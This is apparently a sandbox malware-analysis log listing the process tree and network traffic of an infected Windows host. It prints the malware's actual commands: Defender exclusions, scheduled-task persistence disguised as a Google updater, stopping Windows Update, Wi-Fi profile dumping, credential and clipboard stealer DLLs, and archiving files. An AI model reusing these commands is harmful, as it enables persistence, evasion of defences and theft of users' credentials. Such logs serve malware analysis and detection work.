"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9504 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10456 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x9c,0x108,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tM6SC9Xu.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tM6SC9Xu.exe

C:\Users\Admin\AppData\Local\Temp\86F1.exe

C:\Users\Admin\AppData\Local\Temp\86F1.exe

C:\Users\Admin\AppData\Local\Temp\953A.exe

C:\Users\Admin\AppData\Local\Temp\953A.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\KE7RO4Oi.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\KE7RO4Oi.exe

C:\Users\Admin\AppData\Local\Temp\9B85.exe

C:\Users\Admin\AppData\Local\Temp\9B85.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JH61ge1.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JH61ge1.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8588 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\A0F4.exe

C:\Users\Admin\AppData\Local\Temp\A0F4.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2mU933lv.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2mU933lv.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 8132 -ip 8132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8132 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5872 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x48c 0x4ec

C:\Users\Admin\AppData\Local\Temp\C3FE.exe

C:\Users\Admin\AppData\Local\Temp\C3FE.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3320 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\F725.exe

C:\Users\Admin\AppData\Local\Temp\F725.exe

C:\Users\Admin\AppData\Local\Temp\1145.exe

C:\Users\Admin\AppData\Local\Temp\1145.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\281A.exe

C:\Users\Admin\AppData\Local\Temp\281A.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\40F2.exe

C:\Users\Admin\AppData\Local\Temp\40F2.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\4DB5.exe

C:\Users\Admin\AppData\Local\Temp\4DB5.exe

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\5344.exe

C:\Users\Admin\AppData\Local\Temp\5344.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7460 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

"C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "Admin:N"&&CACLS "..\ea7c8244c8" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\ea7c8244c8" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\ea7c8244c8" /P "Admin:R" /E

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 8816 -ip 8816

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8816 -s 580

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\clip64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\system32\tar.exe

tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\114462139309_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,1360190751395269012,6575183961311347996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4488 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 254.20.238.8.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 steamcommunity.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 104.244.42.129:443 twitter.com tcp
US 104.244.42.129:443 twitter.com tcp
JP 23.207.106.113:443 steamcommunity.com tcp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 store.steampowered.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 113.106.207.23.in-addr.arpa udp
US 8.8.8.8:53 129.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 www.epicgames.com udp
US 54.84.169.57:443 www.epicgames.com tcp
US 54.84.169.57:443 www.epicgames.com tcp
US 8.8.8.8:53 www.paypal.com udp
US 151.101.1.21:443 www.paypal.com tcp
US 151.101.1.21:443 www.paypal.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 57.169.84.54.in-addr.arpa udp
US 8.8.8.8:53 91.119.177.108.in-addr.arpa udp
US 8.8.8.8:53 147.47.239.18.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 abs.twimg.com udp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 api.twitter.com udp
US 104.244.42.66:443 api.twitter.com tcp
US 8.8.8.8:53 pbs.twimg.com udp
US 8.8.8.8:53 video.twimg.com udp
US 192.229.233.50:443 pbs.twimg.com tcp
US 8.8.8.8:53 t.co udp
NL 199.232.148.158:443 video.twimg.com tcp
US 104.244.42.5:443 t.co tcp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
US 8.8.8.8:53 i.ytimg.com udp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 8.8.8.8:53 tracking.epicgames.com udp
US 8.8.8.8:53 www.paypalobjects.com udp
NL 142.250.179.150:443 i.ytimg.com tcp
US 54.82.162.139:443 tracking.epicgames.com tcp
US 18.239.36.105:443 static-assets-prod.unrealengine.com tcp
US 18.239.36.105:443 static-assets-prod.unrealengine.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 66.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 50.233.229.192.in-addr.arpa udp
US 8.8.8.8:53 5.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 150.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 158.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 105.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 139.162.82.54.in-addr.arpa udp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 199.232.148.157:443 static.ads-twitter.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 157.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
IE 163.70.151.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
IE 163.70.151.35:443 fbcdn.net tcp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 2.36.159.162.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 104.244.42.66:443 api.twitter.com tcp
FI 77.91.68.249:80 77.91.68.249 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 store.steampowered.com udp
NL 104.85.0.101:443 store.steampowered.com tcp
NL 104.85.0.101:443 store.steampowered.com tcp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 www.epicgames.com udp
US 8.8.8.8:53 www.paypal.com udp
US 8.8.8.8:53 www.paypalobjects.com udp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
